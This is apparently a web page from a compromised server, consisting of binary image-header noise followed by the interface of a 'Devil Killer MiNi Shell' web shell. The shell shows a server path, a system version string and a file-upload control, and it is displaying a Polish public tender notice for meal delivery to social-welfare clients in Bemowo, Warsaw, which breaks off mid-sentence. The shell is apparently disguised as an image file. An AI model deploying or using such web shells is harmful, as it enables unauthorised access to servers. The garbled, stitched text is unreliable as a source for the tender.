JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221129/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221129/0046425601-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Przygotowywanie i dowożenie we wskazane miejsce gorących zestawów obiadowych klientom Ośrodka Pomocy Społecznej Dzielnicy Bemowo m.st. Warszawy i działającego w jego strukturze OWiRON. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">OŚRODEK POMOCY SPOŁECZNEJ DZIELNICY BEMOWO M. ST. WARSZAWY</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 010773800</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Rozłogi 10</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">01-310</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">224871301</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@opsbemowo.waw.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://opsbemowo.waw.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ochrona socjalna</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przygotowywanie i dowożenie we wskazane miejsce gorących zestawów obiadowych klientom Ośrodka Pomocy Społecznej Dzielnicy Bemowo m.st. Warszawy i działającego w jego strukturze OWiRON. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0f1c0468-6f04-11ed-aea3-5a7c432eaced</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00464256</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-11-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00223439/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Przygotowywanie i dowożenie we wskazane miejsce gorących zestawów obiadowych klientom OPS Dz. Bemowo m.st. W-wy</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://opsbemowo.waw.pl/o-nas/zamowienia-publiczne <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia publicznego komunikacja między<br/>Zamawiającym a Wykonawcami odbywa się drogą elektroniczną przy użyciu miniPortalu https://miniportal.uzp.gov.pl/, ePUAPu<br/>https://epuap.gov.pl/wps/portal oraz poczty elektronicznej</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących formularzy: złożenia, zmiany, wycofania oferty lub wniosku oraz formularza do komunikacji.<br/>2. Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej przekazywanej przy ich użyciu, opisane zostały w Regulaminie korzystania z systemu miniPortal dostępnym pod adresem<br/>https://miniportal.uzp.gov.pl/WarunkiUslugi oraz Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP).<br/>3. Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia publicznego, akceptuje warunki korzystania z miniPortalu, określone w Regulaminie miniPortalu oraz zobowiązuje się korzystając z miniPortalu do przestrzegania jego postanowień.<br/>4. Maksymalny rozmiar plików przekazywanych za pośrednictwem dedykowanych formularzy do: złożenia, zmiany i wycofania oferty oraz formularza do komunikacji wynosi 150 MB.<br/>5. Za datę przekazania oferty, oświadczenia, o którym mowa w art. 125 ust. 1 pzp, podmiotowych środków dowodowych, przedmiotowych środków dowodowych oraz innych informacji, oświadczeń lub dokumentów, przekazywanych w postępowaniu, przyjmuje się datę ich przekazania na ePUAP.<br/>6. W postępowaniu korespondencja elektroniczna (inna niż oferta Wykonawcy i załączniki do oferty) odbywa się elektronicznie z pośrednictwem dedykowanego formularza dostępnego na ePUAP oraz udostępnionego przez miniPortal (Formularz do komunikacji). Korespondencja przesłana za pomocą tego formularza nie może być szyfrowana. W korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem ogłoszenia (BZP).<br/>7. Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej: sekretariat@opsbemowo.waw.pl<br/>8. Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń składane są przez Wykonawcę za<br/>pośrednictwem Formularza do komunikacji jako załączniki. Zamawiający dopuszcza również możliwość składania dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń za pomocą poczty elektronicznej na adres sekretariat@opsbemowo.waw.pl Sposób sporządzania dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa RM z dnia 30.12.2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r., poz. 2452).<br/>9. Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji elektronicznej, wskazanych w SWZ.<br/>10.Zamawiający nie przewiduje zwołania zebrania Wykonawców w celu wyjaśnienia wątpliwości dotyczących SWZ.<br/>11.	Osoby uprawnione do komunikowania się z wykonawcami ze strony Zamawiającego to: Magdalena Trzeszczkowska tel. 22 48 71 371 oraz Sławomir Janicki - tel. 22 48 71 377, e-mail: sekretariat@opsbemowo.waw.pl .</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Na podstawie Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego<br/>przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych, dalej: RODO), informujemy, że:<br/>1. Administratorem danych osobowych jest Ośrodek Pomocy Społecznej Dzielnicy Bemowo m. st. Warszawy (Ośrodek) z siedzibą przy ul. Rozłogi 10 w Warszawie (01-310), adres e-mail: sekretariat@opsbemowo.waw.pl, tel. +48-22-48-71-301 https://opsbemowo.waw.pl/, https://opsbemowo.bip.um.warszawa.pl/default.htm.<br/>2. Administrator wyznaczył Inspektora Ochrony Danych Osobowych (IOD), z którym można się skontaktować mailowo pod adresem iod@opsbemowo.waw.pl lub pocztą na adres korespondencyjny Ośrodka wskazany w ust. 1.<br/>3. Administrator przetwarza dane osobowe w celu prowadzenia postępowań o udzielenie zamówień klasycznych oraz organizowania konkursów, których wartość jest równa lub przekracza kwotę 130 000 złotych netto na podstawie ustawy z dnia 11 września 2019 r. prawo zamówień publicznych (ustawa PZP).<br/>4. Odbiorcami danych osobowych mogą być:<br/>1) organy władzy publicznej i podmioty uprawnione do tego na podstawie przepisów prawa, w tym osoby i podmioty, którym zostanie udostępniona dokumentacja postępowania na podstawie art. 18 i 74 ustawy PZP oraz podmioty kontrolne i sprawujące nadzór;<br/>2) Prezydent m st. Warszawy w zakresie zadań związanych z obsługą jednostek organizacyjnych m.st. Warszawy, uprawnione podmioty, którym Administrator zleca usługi (np. operator pocztowy) lub dostarczające administratorowi obsługę np. informatyczną, w tym hostingową, prawną, brakowania dokumentacji, na podstawie umów powierzenia przetwarzania danych;<br/>5. Dane osobowe nie będą przekazywane do państwa trzeciego ani do organizacji międzynarodowej.<br/>6. Dane osobowe będą przechowywane przez okres niezbędny do realizacji celów przetwarzania (minimum przez okres lat 4 od dnia zakończenia postępowania o udzielenie zamówienia) jednak nie krócej niż okres wskazany w przepisach o archiwizacji (ustawy z dnia 14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach), w oparciu o instrukcję kancelaryjną i archiwalną obowiązujące w Ośrodku.<br/>7. W związku z przetwarzaniem danych osobowych przysługują prawa: dostępu do treści swoich danych osobowych (art. 15 RODO) z zastrzeżeniem, że udostępniane dane nie mogą naruszać tajemnic prawnie chronionych, do których zachowania zobowiązany jest Administrator, prawo do ich sprostowania (art. 16 RODO), jak również prawo żądania ograniczenia ich przetwarzania (art. 18 RODO)<br/>8. Przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego – Prezesa Urzędu Ochrony Danych Osobowych ul. Stawki 2, 00-193 Warszawa jeśli Pani/Pana zdaniem przetwarzanie narusza przepisy prawa.<br/>9. Decyzje związane z przetwarzaniem danych nie będą podejmowane w sposób zautomatyzowany a dane nie będą podlegały profilowaniu (art. 22 RODO), co oznacza, że żadne decyzje nie zapadają wyłącznie automatycznie oraz że nie buduje się żadnych profili osób.<br/>10. Obowiązek podania danych osobowych jest wymogiem ustawowym</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Przy przetwarzaniu danych na podstawie i w celu określonym w ust. 3 niniejszej<br/>informacji nie mają zastosowania prawa do przenoszenia danych (art. 20 RODO) i sprzeciwu wobec przetwarzania danych (art. 21 RODO) oraz prawo do złożenia żądania usunięcia danych (art. 17 RODO).</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IOD.26.1.3.2022.SJ</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1)	Przygotowanie i dowożenie we wskazane miejsce w granicach administracyjnych Dzielnicy Bemowo m. st. Warszawy (tj. miejsce zamieszkania osób korzystających z posiłków) gorących zestawów obiadowych dla uprawnionych klientów Ośrodka Pomocy Społecznej Dzielnicy Bemowo m.st. Warszawy przez 7 dni w tygodniu, w tym soboty, niedziele i święta. <br/>2)	Przewidywana, szacunkowa liczba wydawanych zestawów obiadowych:<br/>•	w skali miesiąca wynosić będzie 1217 sztuk,<br/>•	w skali realizacji całej umowy wyniesie 14 600 sztuk.<br/>3)	Przewidywana liczba osób zgłoszonych do korzystania z pomocy w formie gorącego posiłku – obiadu wynosić będzie dziennie ok. 40 osób.<br/>4)	Liczba osób, a tym samym liczba zamawianych zestawów obiadowych, może być zmienna i różnić się w poszczególnych miesiącach. <br/>5)	Gorące zestawy obiadowe dla osób uprawnionych będą dowożone do ich miejsca zamieszkania na terenie Dzielnicy Bemowo przez Wykonawcę w szczelnie zamkniętych, termicznych i jednorazowych biodegradowalnych pojemnikach.<br/>6)	Zestawy obiadowe będą dowożone przez Wykonawcę do miejsca zamieszkania osób na terenie Dzielnicy Bemowo od poniedziałku do niedzieli w godzinach 13:00 – 15:00.<br/>7)	Wszelkie koszty związane z dowozem zestawów obiadowych ponosi Wykonawca.<br/>8)	Istnieje możliwość dowożenia w uzasadnionych przypadkach, suchego prowiantu jako zamiennika za gorący posiłek, po uprzednim pisemnym uzgodnieniu Wykonawcy z Zamawiającym.<br/>9)	Sposób zgłaszania osób uprawnionych do otrzymania zestawów obiadowych:<br/>a)	Upoważniony pracownik OPS będzie przekazywał Wykonawcy listy imienne klientów z adresami zamieszkania i numerami telefonów wraz z liczbą zamówionych zestawów obiadowych dla każdej osoby uprawnionej nie później niż 2 dni robocze przed końcem danego miesiąca, na każdy następny miesiąc;<br/>b)	W przypadku zmian w danym miesiącu dotyczących liczby osób lub liczby zestawów obiadowych, informacja o tych zmianach będzie przekazana do godz. 9.00 dnia poprzedzającego dowiezienie obiadów.<br/>10)	Wykonawca jest zobowiązany do przygotowania i wydawania obiadów z zachowaniem poniżej określonych warunków.<br/>11)	Zestawy obiady powinny być urozmaicone, składać się z tradycyjnych potraw złożonych z co najmniej z dwóch dań:<br/>a)	I danie : zupa z pieczywem;<br/>b)	II danie wieloskładnikowe, surówka/warzywa oraz kompot lub napój.<br/>12)	W ciągu siedmiodniowego żywienia klienci powinni otrzymać cztery razy w tygodniu obiad z porcją mięsa (np. sztuka mięsa, kotlet schabowy, udziec z kurczaka, kotlet mielony) lub sosu mięsnego, raz w tygodniu obiad z rybą, w pozostałe dni dowolność ustalenia menu. <br/>13)	Poszczególne osoby mogą, w konkretnych miesiącach otrzymywać obiady w dniach dostosowanych do indywidualnych potrzeb, tj. w mniejszej liczbie niż 7 dni w tygodniu.<br/>14)	Wymagana wartość energetyczna jednego zestawu obiadowego - co najmniej 1200 kcal;<br/>15)	W miarę potrzeb przygotowanie ciepłego posiłku dietetycznego nastąpi wg wskazań lekarza dla osób będących na diecie.<br/>16)	Minimalna wymagana waga/objętość gotowych potraw:<br/>•	zupa – 500 ml + pieczywo (100g),<br/>•	sztuka mięsa lub inne mięso bez panierki – 100 g bez kości,<br/>•	kotlet schabowy – 150 g,<br/>•	kotlet mielony – 120 g,<br/>•	gulasz/potrawka – 150 g,<br/>•	udko z kurczaka – 150 g,<br/>•	ryba bez panierki – 100 g,<br/>•	ryba z panierką – 150 g,<br/>•	bigos – 250 g,<br/>•	ziemniaki, kasza, makaron, ryż, kopytka – 250 g,<br/>•	ryż z jabłkami – 300 g,<br/>•	surówka – 150 g,<br/>•	warzywa gotowane – 150 g,<br/>•	kompot/napój – 250 ml,<br/>•	pierogi, naleśniki, knedle – 400 g.<br/>17)	Posiłki będą przygotowane z pełnowartościowych produktów, z uwzględnieniem świeżych warzyw i owoców sezonowych.<br/>18)	Wartość odżywcza i energetyczna posiłków musi być zgodna z normami i wytycznymi Instytutu Żywności i Żywienia w zakresie żywienia osób dorosłych.<br/>19)	Co tydzień - najpóźniej do piątku do godz. 16.00 Wykonawca przekaże Zamawiającemu (pocztą elektroniczną) jadłospis na tydzień następny. Jadłospis będzie obejmował gramaturę poszczególnych dań.<br/>20)	Wykonawca realizując przedmiot zamówienia zobowiązany jest do przestrzegania przepisów prawnych w tym również przepisów w zakresie przechowywania i przygotowywania artykułów spożywczych.<br/>21)	Posiłki oraz miejsce ich przygotowania i wydawania muszą spełniać wszystkie wymogi ustawy o bezpieczeństwie żywności i żywienia z 28.08.2006r. (Dz. U z 2022r. poz. 2132).<br/>22)	Samochód/samochody, którym dowożone będą posiłki będzie dostosowany do przewozu żywności, spełniający wszystkie wymagania określone stosownymi przepisami. Wykonawca musi dysponować zaświadczeniem/decyzją/opinią stwierdzającym zatwierdzenie środków transportu przez Państwowa Inspekcję Sanitarną.<br/>23)	W przypadku awarii lub innych nieprzewidzianych zdarzeń Wykonawca jest zobowiązany zapewnić posiłki o nie gorszej jakości na swój koszt z innych źródeł.<br/>24)	Rozliczenie między Zamawiającym i Wykonawcą odbywać się będzie raz w miesiącu do 10 dnia następnego miesiąca, na podstawie prawidłowo wystawionej przez Wykonawcę faktury z podaną liczbą wydanych obiadów, co Wykonawca udokumentuje przedstawiając wygenerowany raport z liczby wydanych obiadów w miesiącu poprzednim. <br/>25)	Złożona faktura wraz z listą osób i liczbą obiadów podlega sprawdzeniu pod względem zgodności dostarczenia do klientów z liczbą wydanych obiadów przez Wykonawcę w miesięcznym okresie rozliczeniowym.<br/>26)	Za prowadzenie dokumentacji stanowiącej podstawę rozliczenia liczby obiadów Zamawiający nie przewiduje dodatkowej opłaty, stanowi to koszt Wykonawcy.<br/>27)	Zamawiający zastrzega sobie prawo weryfikacji jadłospisu oraz przeprowadzenia kontroli jakości, wartości odżywczych oraz gramatury potraw przez wytypowanych pracowników Zamawiającego. W szczególności poprzez:<br/>a)	porównanie zgodności z jadłospisem,<br/>b)	ocenę organoleptyczną (ocena wyglądu potraw, zapachu, oraz smaku poprzez degustację),<br/>c)	ważenie potraw,<br/>d)	porównanie z tabelami wartości odżywczych Instytutu Żywności i Żywienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55321000-6 - Usługi przygotowywania posiłków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">55322000-3 - Usługi gotowania posiłków</p> <p class="mb-0">55520000-1 - Usługi dostarczania posiłków</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-01-01 do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">oferty zostaną ocenione wg wzorów podanych w SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie zawodowe kucharza</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">zatrudnienie dietetyka</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">kryterium społeczne - zatrudnienie kierowcy na podstawie umowy o pracę</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1)	Przygotowanie i dowożenie do siedziby Ośrodka Wsparcia i Rehabilitacji dla Osób Niepełnosprawnych (OWiRON) przy ul. Rozłogi 10 w Warszawie gorących zestawów obiadowych dla uprawnionych klientów OWiRON przez 5 dni w tygodniu, od poniedziałku do piątku, z wyłączeniem dni wolnych i świąt <br/>2)	Przewidywana, szacunkowa liczba wydawanych zestawów obiadowych:<br/>•	w skali miesiąca wynosić będzie 435 sztuk,<br/>•	w skali realizacji całej umowy wyniesie 5 224 sztuk.<br/>3)	Przewidywana liczba osób zgłoszonych do korzystania z pomocy w formie gorącego posiłku – obiadu wynosić będzie dziennie ok. 20 osób.<br/>4)	Liczba osób, a tym samym liczba zamawianych zestawów obiadowych, może być zmienna i różnić się w poszczególnych miesiącach. <br/>5)	Gorące zestawy 